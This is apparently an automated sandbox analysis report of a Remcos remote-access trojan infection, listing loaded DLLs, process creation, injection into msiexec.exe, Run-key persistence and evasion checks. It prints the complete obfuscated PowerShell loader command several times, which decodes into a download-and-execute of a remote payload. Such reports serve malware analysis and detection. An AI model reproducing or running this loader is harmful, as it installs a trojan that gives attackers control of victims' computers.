               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: wintypes.dll
               Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the CLSID of the VBScript scripting engine, i.e. wscript.exe locating vbscript.dll to run the sample)
               Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
               Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
               Source: C:\ProgramData\Remcos\remcos.exe | Automated click: OK
               Source: Window Recorder | Window detected: More than 3 window changes detected
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
               Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
               Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
               Note: the msiexec.pdb path appears in memory of all three remcos.exe instances (process indexes 9, 10 and 11) and in the dropped file remcos.exe.8.dr, which msiexec.exe (process index 8) wrote to C:\ProgramData\Remcos\. That is consistent with "remcos.exe" being a renamed copy of the legitimate msiexec.exe used as the host process for the injected Remcos payload rather than a purpose-built binary; hash the dropped file against the system's msiexec.exe before treating it as a distinct sample.
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1700456681.0000021385281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698077766.0000021385081000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+m source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2019662882.0000000003564000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2049592368.0000000007B66000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

               Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: ShellExecute("powershell", ""echo $Telekabler; function Katukina($F", "", "", "0");
               Source: Yara match | File source: 00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Idyxkataloger)$gloBaL:jAVAnee67 = [SysTeM.teXt.eNCOdInG]::asCiI.GETsTRing($PRoREX)$gLobaL:kAlDaEere=$jaVaneE67.sUBsTRiNg($planETA,$makrOKaLdEne218)<#Retruded Masseproduceredes Rekapi
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nonmature $anseendetyttefelt $Tmrerblyanter), (Prerealisation @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bravaders = [AppDomain]::CurrentDomain.GetAss
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fisen)), $anseendetortfrernes).DefineDynamicModule($Enoghalvtreds56, $false).DefineType($Militariser, $regnskabsmodeller, [System.Mult
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Idyxkataloger)$gloBaL:jAVAnee67 = [SysTeM.teXt.eNCOdInG]::asCiI.GETsTRing($PRoREX)$gLobaL:kAlDaEere=$jaVaneE67.sUBsTRiNg($planETA,$makrOKaLdEne218)<#Retruded Masseproduceredes Rekapi
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F8ADC Sleep,LoadLibraryW,GetProcAddress,9_2_001F8ADC
              Source: remcos.exe.8.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7651F5 push eax; ret 1_2_00007FFD9B765251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7600AD pushad ; iretd 1_2_00007FFD9B7600C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3369B push ebx; iretd 3_2_04E336DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3D75E pushad ; ret 3_2_04E3D761
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3DA0C pushfd ; ret 3_2_04E3DA0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D02CA7 pushad ; retf 3_2_07D02CF9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D093FB push FFFFFF8Bh; iretd 3_2_07D0940A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D09C3C push FFFFFF8Bh; iretd 3_2_07D09C45
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0470 push ecx; iretd 8_2_044D0477
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D1E72 push eax; retf 8_2_044D1E89
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0E00 pushad ; ret 8_2_044D0E01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D4CD7 push esp; ret 8_2_044D4CD9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0EE4 pushad ; ret 8_2_044D0ED1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D3480 push esp; retf 8_2_044D3488
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0890 push esp; retf 8_2_044D08F3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D4A93 push ds; ret 8_2_044D4AAE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D04A4 push esp; ret 8_2_044D04AD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0EA6 pushad ; ret 8_2_044D0ED1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D437B push esp; iretd 8_2_044D4381
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D2B0E push esp; ret 8_2_044D2B45
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D290B push 3ACA1D5Bh; iretd 8_2_044D2912
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D3D04 push esp; ret 8_2_044D3D05
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D17C0 push ds; ret 8_2_044D17C6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D2F8B push 00000047h; ret 8_2_044D2F8D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D239E push esp; iretd 8_2_044D239F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D35AC push ds; ret 8_2_044D35AE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D25A8 push ds; ret 8_2_044D25AA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D35A7 push 00000023h; retf 8_2_044D35A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D45BA push es; iretd 8_2_044D45BB
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F9F2D push ecx; ret 9_2_001F9F40
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Remcos\remcos.exe

              Boot Survival

              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F7DD0 StartServiceCtrlDispatcherW,GetLastError,9_2_001F7DD0
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5300
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4571
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7586
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2130
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_9-3118
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_9-3118
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-3089
              Source: C:\ProgramData\Remcos\remcos.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-2970
              Source: C:\ProgramData\Remcos\remcos.exeAPI coverage: 7.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2169804742.0000000006DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: powershell.exe, 00000001.00000002.1862598216.00000223D715F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E39219 LdrInitializeThunk,3_2_04E39219
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F59F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,9_2_001F59F2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F8ADC Sleep,LoadLibraryW,GetProcAddress,9_2_001F8ADC
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F63E3 mov eax, dword ptr fs:[00000030h]9_2_001F63E3
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F9C10 SetUnhandledExceptionFilter,9_2_001F9C10
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F95F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_001F95F0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match | File source: amsi64_2504.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 44D0000
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetArugeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" (same obfuscated command line as listed above, lower-cased)
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" (same obfuscated command line as listed above, lower-cased)
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" (same obfuscated command line as listed above, lower-cased)
